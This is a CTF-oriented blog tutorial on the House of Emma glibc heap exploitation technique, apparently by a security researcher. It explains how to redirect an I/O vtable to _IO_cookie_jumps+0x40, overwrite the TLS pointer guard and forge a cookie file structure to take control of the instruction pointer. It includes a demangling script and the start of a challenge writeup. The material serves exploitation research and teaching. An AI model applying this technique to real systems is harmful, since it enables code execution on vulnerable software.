Foreword
Before embarking on this deep dive into House of Emma, a heap exploitation technique, we should have a basic understanding of House of Kiwi from another post: it provides the I/O trigger that House of Emma relies on.
There are several well-regarded articles discussing the House of Emma exploitation technique. However, I've identified some key misunderstandings in the attack chain. Why do we alter the vtable pointer to _IO_cookie_jumps with an offset of 0x40? Why place our malicious gadget at offset 0xF0, which exceeds the length limit of a standard file struct? And what is the ultimate goal of this chain: where does it finally hijack RIP? Contrary to popular belief, the destination is NOT the __cookie pointer.
Even though we can now use another attack chain, House of Apple, to hijack I/O operations in a relatively simpler way, the seemingly more complex House of Emma—which requires deeper research into the TLS/TCB structure—remains an enlightening and powerful methodology in heap exploitation for high-version GLIBC such as 2.35.
In the writeup section of this article, I'll walk through a PWN challenge that exploits GLIBC 2.34, which helps us to explore these questions in depth and untangle the complexities of this technique.
Overview
In the GLIBC 2.34 release, which was made public on August 1, 2021, commonly used hooks in CTF pwn challenges, such as __free_hook and __malloc_hook, were removed. Furthermore, after glibc-2.34-0ubuntu3.2_amd64, hijacking the vtable pointer in an IO struct is restricted by IO_validate_vtable, which we introduced here.
Due to changes in the new version, we are forced to rethink our exploitation approach. Traditionally, we aimed for arbitrary address allocation to achieve arbitrary read/write, which eventually led to a shell. Now, the goal has shifted to directly writing to a controlled address that leads to a shell or execution flow hijacking, leveraging the IO_FILE structure used in low-level I/O operation.
Soon after that release, a talented hacker introduced a fantastic attack chain in this article and named it the "House of Emma".
However, the author did not explicitly explain the attack chain, and even other well-regarded articles, such as the analysis by Qianxin, a leading cybersecurity company in China, have, in my view, misinterpreted the actual execution flow.
_IO_cookie_jumps
A simple recap of the security check IO_validate_vtable:
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */
uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
uintptr_t ptr = (uintptr_t) vtable;
uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
if (__glibc_unlikely (offset >= section_length))
/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */
_IO_vtable_check ();
return vtable;
}
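The fast path above boils down to a single unsigned range test. The following is a minimal Python sketch of that test only; the section addresses are hypothetical values chosen for illustration, and the slow path (_IO_vtable_check) is not modeled.

```python
MASK64 = (1 << 64) - 1

def vtable_in_section(vtable: int, start: int, stop: int) -> bool:
    """Fast-path test: unsigned (vtable - start) must be below (stop - start)."""
    section_length = (stop - start) & MASK64
    offset = (vtable - start) & MASK64  # wraps around like uintptr_t arithmetic
    return offset < section_length

# Hypothetical section bounds, not taken from any real libc build.
START = 0x7ffff7e15a00
STOP = START + 0xd68

print(vtable_in_section(START + 0x40, START, STOP))     # pointer inside the section
print(vtable_in_section(0x55555555a000, START, STOP))   # heap-like pointer outside it
```

Because the subtraction is unsigned, a pointer below the section wraps to a huge offset and fails the same comparison, so one test covers both ends of the range.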
We can no longer hijack the vtable pointer in the _IO_FILE_plus struct with arbitrary values, but only within the section of __libc_IO_vtables. Thus, the House of Emma introduces a methodology to complete the attack while adhering to these restrictions. By modifying the vtable pointer to _IO_xxxx_jumps and applying a slight offset, we can manipulate the normal execution flow to redirect it to other executable functions. These functions reference an IO_FILE structure that we control through some other arbitrary-address-write primitive, such as the Largebin Attack introduced in this post.
Unlike techniques such as House of Apple or House of Cat, where the vtable is replaced with _IO_wfile_jumps, in this case, we leverage _IO_cookie_jumps, which follows a similar structure:
static const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {
JUMP_INIT_DUMMY, // Offset: 0x00, Size: 0x10 (Dummy entry)
JUMP_INIT(finish, _IO_file_finish), // Offset: 0x10, Size: 0x08
JUMP_INIT(overflow, _IO_file_overflow), // Offset: 0x18, Size: 0x08
JUMP_INIT(underflow, _IO_file_underflow), // Offset: 0x20, Size: 0x08
JUMP_INIT(uflow, _IO_default_uflow), // Offset: 0x28, Size: 0x08
JUMP_INIT(pbackfail, _IO_default_pbackfail), // Offset: 0x30, Size: 0x08
JUMP_INIT(xsputn, _IO_file_xsputn), // Offset: 0x38, Size: 0x08
JUMP_INIT(xsgetn, _IO_default_xsgetn), // Offset: 0x40, Size: 0x08
JUMP_INIT(seekoff, _IO_cookie_seekoff), // Offset: 0x48, Size: 0x08
JUMP_INIT(seekpos, _IO_default_seekpos), // Offset: 0x50, Size: 0x08
JUMP_INIT(setbuf, _IO_file_setbuf), // Offset: 0x58, Size: 0x08
JUMP_INIT(sync, _IO_file_sync), // Offset: 0x60, Size: 0x08
JUMP_INIT(doallocate, _IO_file_doallocate), // Offset: 0x68, Size: 0x08
JUMP_INIT(read, _IO_cookie_read), // Offset: 0x70, Size: 0x08
JUMP_INIT(write, _IO_cookie_write), // Offset: 0x78, Size: 0x08
JUMP_INIT(seek, _IO_cookie_seek), // Offset: 0x80, Size: 0x08
JUMP_INIT(close, _IO_cookie_close), // Offset: 0x88, Size: 0x08
JUMP_INIT(stat, _IO_default_stat), // Offset: 0x90, Size: 0x08
JUMP_INIT(showmanyc, _IO_default_showmanyc), // Offset: 0x98, Size: 0x08
JUMP_INIT(imbue, _IO_default_imbue) // Offset: 0xA0, Size: 0x08
};
This particular vtable uses the struct _IO_jump_t. The function pointers inside are initialized via the JUMP_INIT macro, and each corresponds to a specific operation in the vtable.
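The offsets annotated in the table follow a simple rule: a 0x10-byte dummy header followed by 8-byte slots. A short Python sketch, assuming the x86_64 layout shown above (the helper name slot_offset is made up for illustration), reproduces them:

```python
# Slot names in declaration order, after the 0x10-byte JUMP_INIT_DUMMY header.
SLOTS = [
    "finish", "overflow", "underflow", "uflow", "pbackfail", "xsputn",
    "xsgetn", "seekoff", "seekpos", "setbuf", "sync", "doallocate",
    "read", "write", "seek", "close", "stat", "showmanyc", "imbue",
]

def slot_offset(name: str) -> int:
    """Byte offset of a slot inside struct _IO_jump_t (8-byte pointers assumed)."""
    return 0x10 + 8 * SLOTS.index(name)

for name in SLOTS:
    print(f"{name:<11} {slot_offset(name):#04x}")
```

Having the offsets available by name makes it harder to miscount a slot when planning which entry a given I/O call will reach.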
_IO_cookie_xxxx
In typical situations, the _IO_cookie_jumps vtable pointer is set when the fopencookie function is called. In an attack scenario, once we successfully modify the vtable pointer to _IO_cookie_jumps, several functions within this vtable, such as _IO_cookie_read, _IO_cookie_write, _IO_cookie_seek, and _IO_cookie_close, can potentially lead to arbitrary function pointer execution, provided that we control the memory at specific offsets of the hijacked IO_FILE.
Function _IO_cookie_read at offset 0x70:
static ssize_t
_IO_cookie_read (FILE *fp, void *buf, ssize_t size)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (read_cb);
#endif
if (read_cb == NULL)
return -1;
return read_cb (cfile->__cookie, buf, size);
}
Function _IO_cookie_write at offset 0x78:
static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif
if (write_cb == NULL)
{
fp->_flags |= _IO_ERR_SEEN;
return 0;
}
ssize_t n = write_cb (cfile->__cookie, buf, size);
if (n < size)
fp->_flags |= _IO_ERR_SEEN;
return n;
}
Function _IO_cookie_seek at offset 0x80:
static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (seek_cb);
#endif
return ((seek_cb == NULL
|| (seek_cb (cfile->__cookie, &offset, dir)
== -1)
|| offset == (off64_t) -1)
? _IO_pos_BAD : offset);
}
Function _IO_cookie_close at offset 0x88:
static int
_IO_cookie_close (FILE *fp)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (close_cb);
#endif
if (close_cb == NULL)
return 0;
return close_cb (cfile->__cookie);
}
They all eventually call a callback named xxxx_cb with cfile->__cookie as its first argument, where cfile refers to an extended IO_FILE structure built on top of the original _IO_FILE.
struct _IO_cookie_file
The variable cfile is used to reach those callbacks. From the internal C library functions shown above, we can see that it has the type struct _IO_cookie_file:
/* Special file type for fopencookie function. */
struct _IO_cookie_file
{
struct _IO_FILE_plus __fp;
void *__cookie; // offset: 0xE0
cookie_io_functions_t __io_functions; // offset: 0xE8
};
It is larger than the standard _IO_FILE_plus (whose last member, the vtable pointer, sits at offset 0xD8), adding new members from offset 0xE0.
__io_functions
At offset 0xE8 of struct _IO_cookie_file sits the __io_functions member, an embedded structure of the special type cookie_io_functions_t:
type = struct _IO_cookie_io_functions_t {
cookie_read_function_t *read; // Offset: 0x00, 0xE8 in _IO_cookie_file
cookie_write_function_t *write; // Offset: 0x08, 0xF0 in _IO_cookie_file
cookie_seek_function_t *seek; // Offset: 0x10, 0xF8 in _IO_cookie_file
cookie_close_function_t *close; // Offset: 0x18, 0x100 in _IO_cookie_file
}
This is the real destination of the attack chain for House of Emma, where we hijack rip with an evil pointer.
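To double-check the offsets quoted above, the layout can be mirrored with ctypes. This is only a sketch: the embedded _IO_FILE_plus is treated as an opaque 0xE0-byte blob (an assumption based on the x86_64 offsets in this article), and the Python class names are invented for illustration.

```python
import ctypes

class CookieIoFunctions(ctypes.Structure):
    # Four 8-byte function pointers, modeled as plain 64-bit integers.
    _fields_ = [
        ("read", ctypes.c_uint64),
        ("write", ctypes.c_uint64),
        ("seek", ctypes.c_uint64),
        ("close", ctypes.c_uint64),
    ]

class CookieFile(ctypes.Structure):
    _fields_ = [
        ("fp", ctypes.c_ubyte * 0xE0),       # opaque struct _IO_FILE_plus
        ("cookie", ctypes.c_uint64),         # void *__cookie
        ("io_functions", CookieIoFunctions), # cookie_io_functions_t
    ]

base = CookieFile.io_functions.offset
print(hex(CookieFile.cookie.offset))                 # __cookie
print(hex(base + CookieIoFunctions.write.offset))    # __io_functions.write
print(hex(ctypes.sizeof(CookieFile)))                # total size of the model
```

The model shows why the fake structure has to extend past a plain FILE: the fields that matter live beyond the vtable pointer at 0xD8.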
PTR_DEMANGLE
If we look carefully, there's a special preprocessor directive (#ifdef) and a function-like macro (PTR_DEMANGLE) inside each function snippet:
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif
- If PTR_DEMANGLE is defined, the code between the #ifdef and the corresponding #endif is included in the compilation.
- If PTR_DEMANGLE is not defined, the code block is ignored.
This is a security measure to prevent attackers from manipulating function pointers:
extern uintptr_t __pointer_chk_guard attribute_relro;
# define PTR_MANGLE(var) \
(var) = (__typeof (var)) ((uintptr_t) (var) ^ __pointer_chk_guard)
# define PTR_DEMANGLE(var) PTR_MANGLE (var)
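Take the _IO_cookie_write function as an example; we can disassemble it in GDB:
The macro takes a pointer variable var (loaded from rdi+0xf0), converts it to a uintptr_t, and XORs it with __pointer_chk_guard from the TLS segment. The generic definition above only XORs; on x86_64 the architecture-specific version also rotates the value right by 0x11 bits before the XOR, as the disassembly shows: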
mov rax, [rdi+0xf0]
ror rax, 0x11
xor rax, fs:[0x30]
The pointer encryption guard value is initialized by the dynamic linker, which exposes two variables: __pointer_chk_guard_local is hidden and can be used by dynamic linker code to access the guard value more efficiently, and __pointer_chk_guard is global and should be used by the dynamically linked C library.
pointer_guard
The pointer_guard (__pointer_chk_guard) is the value stored at fs:[0x30] (fs:[offsetof(tcbhead_t, pointer_guard)]), used by the PTR_MANGLE and PTR_DEMANGLE macros to encrypt and decrypt function pointers, as discussed earlier.
This topic requires a solid understanding of TLS/TCB. I highly recommend the research by Chao-tic. Though it's a lengthy read, it's wonderfully written and well worth the time—I found myself reading it twice.
Here, I'll provide a brief introduction to the parts most relevant to our attack.
__pointer_chk_guard
Where can we find the pointer guard (__pointer_chk_guard)?
It's stored within a data structure known as the Thread Control Block (TCB), which holds important information and metadata to manage a thread and its associated local storage (TLS).
In Linux systems, tcbhead_t is the specific implementation of the TCB used by LIBC.
type = struct {
/* 0 | 8 */ void *tcb;
/* 8 | 8 */ dtv_t *dtv;
/* 16 | 8 */ void *self;
/* 24 | 4 */ int multiple_threads;
/* 28 | 4 */ int gscope_flag;
/* 32 | 8 */ uintptr_t sysinfo;
/* 40 | 8 */ uintptr_t stack_guard; // offset 0x28
/* 48 | 8 */ uintptr_t pointer_guard; // offset 0x30
/* 56 | 16 */ unsigned long unused_vgetcpu_cache[2];
/* 72 | 4 */ unsigned int feature_1;
/* 76 | 4 */ int __glibc_unused1;
/* 80 | 32 */ void *__private_tm[4];
/* 112 | 8 */ void *__private_ss;
/* 120 | 8 */ unsigned long long ssp_base;
/* 128 | 512 */ __128bits __glibc_unused2[8][4];
/* 640 | 64 */ void *__padding[8];
/* total size (bytes): 704 */
}
At offsets 0x28 and 0x30, we encounter familiar components: the stack_guard, which holds the canary value, and the pointer_guard, which is the key used to XOR-encrypt function pointers. These values are randomly generated each time the program starts. In GDB, we can view them by inspecting the fsbase:
The fs register is commonly used for thread-local storage (TLS) and other context-sensitive data on x86 and x86_64 (AMD64) architectures, primarily for accessing thread-specific or CPU-specific data in a flat memory model (Windows and macOS use the GS register for this purpose):
- The fs register stores a base address that points to the TLS area.
- Using this base address, thread-local variables can be quickly accessed by adding an offset to the value in the fs register.
Thus, the pointer_guard value is located at fs:[0x30], which corresponds to a specific TLS offset adjacent to the LIBC memory area. This offset remains constant, enabling predictable manipulation. However, leaking or directly modifying it is challenging: changing the fs register requires kernel-level privileges (ring 0), while we operate at ring 3 (user land). While we can read the values reached through FS and GS, we cannot change the addresses they point to.
As attackers, though, we can attempt to modify the value at this exact address using various exploit primitives, such as:
- Fastbin Reverse Into Tcache
- Tcache Stashing Unlink Attack
- LargeBin Attack
Overall, the main idea is to leverage vulnerabilities to replace this random value with a known value, such as a leaked address, overcoming the protections provided by pointer encryption.
__pointer_chk_guard_local
In fact, there is a copy of the pointer guard stored as the global variable __pointer_chk_guard_local, located in the .RODATA section (read-only), which cannot be overwritten.
This copy allows for easy and fast access. When we overwrite the value at fs:[0x30], the __pointer_chk_guard_local remains unchanged.
Algorithm
Now that we know what the pointer_guard is and where it resides, we can use maths to show how the PTR_MANGLE macro encrypts function pointers and how PTR_DEMANGLE decrypts them.
For the encryption process (PTR_MANGLE):
rol(ptr ^ pointer_guard, 0x11, 64)
For the decryption process (PTR_DEMANGLE):
ror(enc, 0x11, 64) ^ pointer_guard
In an exploit scenario, if we can hijack the pointer_guard and replace it with an evil_guard (using techniques like a Largebin Attack, for example), we can then write the enc value to a controlled memory area, namely a fake _IO_cookie_file structure in House of Emma. By encrypting our malicious function pointer (ptr), we can ultimately hijack the RIP:
enc = rol(ptr ^ evil_guard, 0x11, 64)
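The two formulas can be checked with a few lines of Python. This is a sketch of the arithmetic only; the helper names ptr_mangle and ptr_demangle are made up here, and the sample guard and pointer are the values observed in the fopencookie demo of this article.

```python
MASK64 = (1 << 64) - 1

def rol(value: int, shift: int, bits: int = 64) -> int:
    """Rotate left within a fixed bit width."""
    shift %= bits
    return ((value << shift) | (value >> (bits - shift))) & ((1 << bits) - 1)

def ror(value: int, shift: int, bits: int = 64) -> int:
    """Rotate right within a fixed bit width."""
    shift %= bits
    return ((value >> shift) | (value << (bits - shift))) & ((1 << bits) - 1)

def ptr_mangle(ptr: int, guard: int) -> int:
    # XOR with the guard first, then rotate left by 0x11.
    return rol((ptr ^ guard) & MASK64, 0x11)

def ptr_demangle(enc: int, guard: int) -> int:
    # Inverse order: rotate right by 0x11, then XOR with the guard.
    return ror(enc, 0x11) ^ guard

guard = 0xb63577e972ba6797   # pointer_guard seen in the demo run
ptr = 0x555555555269         # address of my_write in the demo run
enc = ptr_mangle(ptr, guard)
print(hex(enc), hex(ptr_demangle(enc, guard)))
```

In an exploit, guard would be the evil_guard value written over fs:[0x30], and ptr the gadget address we want rip to reach.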
Prerequisites
To successfully carry out the House of Emma attack, the following primitives are typically required:
- The ability to write to a controlled address arbitrarily (using techniques like LargeBin Attack, Tcache Stashing Unlink Attack, etc.).
- The ability to trigger an I/O stream (via FSOP or House of Kiwi).
Trigger
Therefore, triggering an I/O stream is essential for exploiting heap vulnerabilities related to IO structures.
I've previously introduced methods to trigger I/O operations without the program's awareness in House of Kiwi. I won't delve into that topic here, but if needed, you can explore the detailed methodology through the link.
Simply put, one straightforward way to trigger an I/O operation is by leveraging the exit function, if present in the binary:
exit
└───► fcloseall
└───► _IO_cleanup
└───►_IO_flush_all_lockp
└───►_IO_OVERFLOW
Alternatively, __malloc_assert can come into play if the allocator fails to allocate a chunk as requested:
_int_malloc
└───►sysmalloc
└───►__malloc_assert
└───► fflush(stderr)
└───►_IO_file_sync
Additionally, there's another execution chain that runs before fflush is triggered:
_int_malloc
└───► sysmalloc
└───► __malloc_assert
└───► __fxprintf
└───► __vfxprintf
└───► __vfxprintf_internal
└───► _IO_file_xsputn
In this post introducing House of Emma, we will use the latter method to trigger I/O operations, as the upcoming PWN challenge I will analyze never calls exit but runs in an infinite loop.
Attack Chain
We opt to trigger __malloc_assert to initiate the I/O operation (using the House of Kiwi attack). Before the IO structure is hijacked, the binary will print an error message.
Once we hijack the vtable pointer to _IO_cookie_jumps, the __fxprintf call on stderr inside __malloc_assert will navigate into the IO structure under our control as follows:
Let me explain explicitly what happens in the above image. Before hijacking, the flow would look like this:
stderr->_IO_file_jumps->_IO_file_xsputn
After hijacking stderr, we can overwrite its vtable pointer at offset 0xD8 with the pointer to _IO_cookie_jumps, resulting in the following flow:
(hijacked)stderr->_IO_cookie_jumps->_IO_new_file_xsputn
However, executing _IO_new_file_xsputn doesn't allow for arbitrary function pointer execution, so it does not serve our goal. This is where the House of Emma introduces a key technique: offsetting the vtable pointer.
Specifically, after hijacking stderr, we can write _IO_cookie_jumps+0x40 into the vtable pointer position. The xsputn slot lives at offset 0x38, so the call now lands on offset 0x38 + 0x40 = 0x78 of _IO_cookie_jumps, which is _IO_cookie_write:
Notice that rdi (and rbx) points to a heap address, aka the fake stderr, which we control. The flow is now:
(hijacked)stderr->_IO_cookie_jumps+0x40->_IO_cookie_write
Therefore, the full Attack Chain for House of Emma can be depicted as:
__malloc_assert
└───►__fxprintf
└───► _IO_file_xsputn (before)
└───► _IO_cookie_write (after)
└───► write_cb (cfile->__cookie, buf, size)
Alternatively, we can target the _IO_file_sync slot reached through fflush(stderr) by choosing a different vtable offset for the fake stderr structure. Additionally, we can select any of the _IO_cookie_xxxx functions (read, seek, close), not just the write function, by adjusting the corresponding offset.
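The required shift is simply the distance between the slot the trigger uses and the cookie slot we want to reach. A small Python sketch, using the slot offsets from the _IO_cookie_jumps listing earlier (the helper name vtable_shift is hypothetical):

```python
# Slots the two triggers discussed in this article go through.
TRIGGER_SLOTS = {"xsputn": 0x38, "sync": 0x60}
# Cookie callbacks that end in an indirect call through __io_functions.
COOKIE_SLOTS = {"read": 0x70, "write": 0x78, "seek": 0x80, "close": 0x88}

def vtable_shift(trigger: str, target: str) -> int:
    """Offset to add to _IO_cookie_jumps so that `trigger` lands on `target`."""
    return COOKIE_SLOTS[target] - TRIGGER_SLOTS[trigger]

for trigger in TRIGGER_SLOTS:
    for target in COOKIE_SLOTS:
        shift = vtable_shift(trigger, target)
        print(f"{trigger:>6} -> _IO_cookie_{target:<5} : _IO_cookie_jumps+{shift:#x}")
```

For the xsputn trigger and the write callback this gives the 0x40 used throughout this article. Whichever combination is chosen, the shifted pointer must still fall inside the __libc_IO_vtables section to pass IO_validate_vtable.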
So, what happens after hijacking the vtable pointer to _IO_cookie_jumps+0x40, ultimately leading to the desired endpoint, write_cb? Let's first take a preliminary look at an attack demo running in GDB to better understand the overall scenario.
Once we've set up the deployment as discussed earlier, we can dive deeper into the behavior of the _IO_cookie_write function and observe its unusual, manipulated execution flow:
At some point above, the value stored at [rdi+0xe0] is used as the first argument for the upcoming function call to write_cb. Before this operation, rdi points to the cfile (the fake _IO_cookie_file structure), as it is the first argument of the current function call, _IO_cookie_write. At offset 0xE0 of the fake _IO_cookie_file, we have the void* __cookie pointer, which we can hijack to pass as the first argument to our malicious function.
Moving back to the beginning of the function, at _IO_cookie_write+4 the instruction mov rax, [rdi+0xf0] loads the encrypted function pointer. After it is decrypted with the hijacked pointer_guard, control is transferred to it (namely, executing write_cb):
Notice that I placed a carefully constructed value at this specific position, which the PTR_DEMANGLE macro decrypts into the evil gadget, getkeyserv_handle+576:
After controlling the rdx register with this evil gadget, we can then continue the classic exploit chain using the setcontext+61 gadget. We will show the remaining part in our exploit script for the PWN challenge.
All the evil gadgets mentioned here are introduced in this post.
In conclusion, we need to fake the stderr and _IO_cookie_file structure, especially controlling the values at offsets 0xE0 and 0xF0 of the fake _IO_cookie_file. But why there?
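The three fields discussed so far can be laid out with a few struct.pack_into calls. The following is a minimal sketch only: the function name and every address are hypothetical placeholders, and the remaining FILE fields that a real exploit must keep valid to reach the xsputn call (flags, lock pointer, and so on) are deliberately left as zero here.

```python
import struct

def build_fake_cookie_file(vtable: int, cookie: int, enc_write: int,
                           size: int = 0x108) -> bytes:
    """Lay out only the fields House of Emma cares about; the rest stays zero."""
    buf = bytearray(size)
    struct.pack_into("<Q", buf, 0xD8, vtable)     # vtable pointer of _IO_FILE_plus
    struct.pack_into("<Q", buf, 0xE0, cookie)     # __cookie, becomes rdi of the callback
    struct.pack_into("<Q", buf, 0xF0, enc_write)  # mangled __io_functions.write
    return bytes(buf)

# Placeholder values for illustration; real ones come from leaks at runtime.
IO_COOKIE_JUMPS = 0x7ffff7e16b20   # hypothetical address of _IO_cookie_jumps
FAKE_ARG = 0x55555555c000          # hypothetical pointer passed as first argument
ENC_GADGET = 0x1122334455667788    # hypothetical already-mangled gadget pointer

fake = build_fake_cookie_file(IO_COOKIE_JUMPS + 0x40, FAKE_ARG, ENC_GADGET)
print(len(fake), fake[0xD8:0xF8].hex())
```

When such a buffer is written into a heap chunk, the 0x10-byte chunk header has to be accounted for separately, since the offsets above are relative to the start of the fake FILE.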
Debug
To understand how the House of Emma works, we need to take a closer look at the execution flow triggered by the _IO_cookie_jumps pointer.
As mentioned earlier, when the vtable pointer is overwritten with _IO_cookie_jumps or a relative offset of it, the program references this jump table and executes the corresponding function pointers. Additionally, the read, write, seek, and close functions refer to the _IO_cookie_file structure, a specialized case of _IO_FILE designed for user-defined I/O operations.
Typically, this structure is used when fopencookie is called to create a custom I/O stream with user-specified operations for reading, writing, seeking, and closing.
Demo Code
Now, let's examine the typical case before the I/O stream is exploited. I've written a C program and compiled it to test the fopencookie function:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Custom write function
ssize_t my_write(void *cookie, const char *buf, size_t size) {
printf("Custom write function called with size: %zu\n", size);
printf("Buffer contents: %.*s\n", (int)size, buf);
// Accessing the cookie data for demonstration purposes
if (cookie != NULL) {
int *my_cookie = (int *)cookie;
printf("Cookie value: %d\n", *my_cookie);
}
return size;
}
// Custom read function
ssize_t my_read(void *cookie, char *buf, size_t size) {
static int called = 0; // Track how many times my_read has been called
const char *data = "Hello, world!";
size_t len = strlen(data);
if (called > 0) {
// Simulate end-of-file after the first read
return 0; // No more data to read
}
if (size > len) size = len;
memcpy(buf, data, size);
called++; // Increment the counter to prevent further reads
printf("Custom read function called, providing data.\n");
return size; // Return the number of bytes read
}
int main() {
// Set up the cookie with custom data
int cookie_data = 0xdeadbeef;
// Set up the cookie IO functions
cookie_io_functions_t io_funcs = {
.read = my_read,
.write = my_write,
.seek = NULL,
.close = NULL
};
// Create a custom stream with fopencookie, using the custom cookie
FILE *custom_stream = fopencookie(&cookie_data, "w+", io_funcs);
if (!custom_stream) {
perror("Failed to open custom stream");
return 1;
}
// Write to the custom stream to trigger the custom write function
fprintf(custom_stream, "Test writing to custom stream.\n");
fflush(custom_stream);
// Close the custom stream
fclose(custom_stream);
return 0;
}
// gcc -g -o fopencookie fopencookie.c
This C code defines custom functions like my_read and my_write. They're designed to simulate the behavior of reading/writing from a custom file-like object created using fopencookie in GLIBC. The custom functions are part of the cookie_io_functions_t structure, which allows us to define our own read, write, seek, and close operations for file streams.
Goal
The objective of the debugging process here is to understand how the my_write function, registered through the cookie_io_functions_t structure, is called internally by _IO_cookie_write in glibc:
To solve our questions for House of Emma, we will:
- Investigate the _IO_cookie_file structure to understand how it stores the custom I/O functions (such as my_read and my_write).
- Debug the behavior of the __io_functions field within GLIBC to understand how the fopencookie mechanism uses it to handle custom file operations.
Go-Through
Our ultimate goal in the House of Emma exploit is to hijack execution through _IO_cookie_write. To further analyze this, we can set a breakpoint at this function and inspect it in GDB:
It behaves exactly as described in the previous chapters. We know its 1st argument is FILE *fp, passed in the rdi register. Let's look at the source code of the _IO_cookie_write function again:
static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif
if (write_cb == NULL)
{
fp->_flags |= _IO_ERR_SEEN;
return 0;
}
ssize_t n = write_cb (cfile->__cookie, buf, size);
if (n < size)
fp->_flags |= _IO_ERR_SEEN;
return n;
}
In this function, the FILE *fp argument is cast to the _IO_cookie_file structure. This cast transforms the generic FILE stream pointer into the more specific _IO_cookie_file structure, which is used when working with custom I/O operations through fopencookie.
Inspect fp at runtime:
A closer look at fp, aka cfile, viewed as the structure _IO_cookie_file:
The vtable now points to _IO_cookie_jumps, exactly as we expect. And outside the file structure, at offset 0xE0, sits the __cookie pointer. It becomes void *cookie, the 1st of the 3 arguments of our demo function my_write, which GLIBC invokes as write_cb (cfile->__cookie, buf, size):
It contains the 4-byte int type data we set in the C code:
And the __io_functions block starting at offset 0xE8, which is another embedded structure, contains 4 function pointers that appear to be obfuscated:
According to the GLIBC source code, it will execute write_cb, namely the write pointer inside this structure:
But it apparently cannot be disassembled, because these pointers are all encrypted by the PTR_MANGLE macro as we introduced.
Let's try to decrypt this one using the algorithm illustrated in previous chapters. First we need to know the pointer_guard value randomly generated at runtime, which is stored at fs:[0x30]:
Extract these values and apply the decryption algorithm of PTR_DEMANGLE:
ror(enc, 0x11, 64) ^ pointer_guard
In our demo, it should be calculated as:
ror(0x45784fde6bfd6c6a, 0x11, 64) ^ 0xb63577e972ba6797
Calculate the result:
def ror(value, shift, bit_size):
"""Performs a bitwise right rotate (ROR) on the given value."""
return ((value >> shift) | (value << (bit_size - shift))) & ((1 << bit_size) - 1)
# Encrypted value and pointer guard
encrypted_value = 0x45784fde6bfd6c6a
pointer_guard = 0xb63577e972ba6797
shift_value = 0x11 # The shift for the ROR operation
bit_size = 64 # 64-bit values
# Apply the ROR and XOR with pointer_guard
decrypted_value = ror(encrypted_value, shift_value, bit_size) ^ pointer_guard
decrypted_value
We have a result of 93824992236137 (0x555555555269 in hexadecimal). Now it looks like a valid function pointer which can be disassembled:
Exactly! This is the my_write function defined in the C code for io_funcs.write, which follows the same structure as cookie_io_functions_t. If we can hijack this value at offset 0xF0 within the _IO_cookie_file structure, we can take control of rip and ultimately hijack the entire execution flow!
End
In conclusion, the target of the attack chain in the House of Emma exploit is the __io_functions.write function pointer, located at offset 0xF0 within the _IO_cookie_file structure. It is called with the __cookie pointer, positioned at offset 0xE0, as its first argument (rdi).
The attack chain can be depicted as:
_IO_cookie_write
└───► write_cb
└───►*(cfile.__io_functions.write)(__cookie, buf, size)
Writeup
In the final chapter, I will share a writeup on exploiting a PWN challenge using the House of Emma methodology, combined with the I/O stream trigger strategy from House of Kiwi.
Binary: link
EXP template: link
Impression
With full protection enabled on the binary within a sandbox, we can still exploit it using the ORW (Open, Read, Write) attack introduced here:
This is not a typical program—it behaves like a virtual machine, telling us only to supply opcodes in binary form:
We can input binary data for a program in Linux system like the following operation, which can be helpful for our debugging:
But obviously we provided a meaningless test payload and the program returns "Invalid opcode" in an infinite loop:
To understand how this program operates, we must decompile the binary to uncover its functionality.
Code Review
Since the main function never calls exit and the other functions only use _exit, which won't trigger the I/O operations necessary for our FSOP attack, we need to leverage the House of Kiwi primitive to perform the exploit by triggering __malloc_assert.
Main
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
void *s; // [rsp+8h] [rbp-8h]
setup(a1, a2, a3);
while ( 1 )
{
puts("Pls input the opcode");
s = malloc(0x2000uLL);
memset(s, 0, 0x2000uLL);
read(0, s, 0x500uLL);
vm_run(s);
free(s);
}
}
It runs an infinite loop, repeatedly asking for user input (opcodes) and executing them in a virtual machine-like environment.
The while (1) loop continuously runs the following operations:
- s = malloc(0x2000uLL): Allocates 0x2000 bytes of memory to hold the user's input.
- memset(s, 0, 0x2000uLL): Clears the allocated memory by setting it to zero.
- read(0, s, 0x500uLL): Reads up to 0x500 bytes from the standard input (file descriptor 0, i.e., stdin) into the allocated memory s.
- vm_run(s): Passes the input to a function called vm_run, which interprets and executes the opcodes in the memory pointed to by s.
- free(s): Frees the allocated memory after vm_run completes.
Setup
int sub_16D5()
{
// ... omit variables
v35 = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
prctl(38, 1LL, 0LL, 0LL, 0LL);
// ... omit dereference
return prctl(22, 2LL, &v1);
}
Usually we don't pay much attention to the setup function. This one, however, configures the sandbox through the prctl syscall, which decides which syscalls our final payload is allowed to use.
- Set Buffering Mode for I/O Streams:
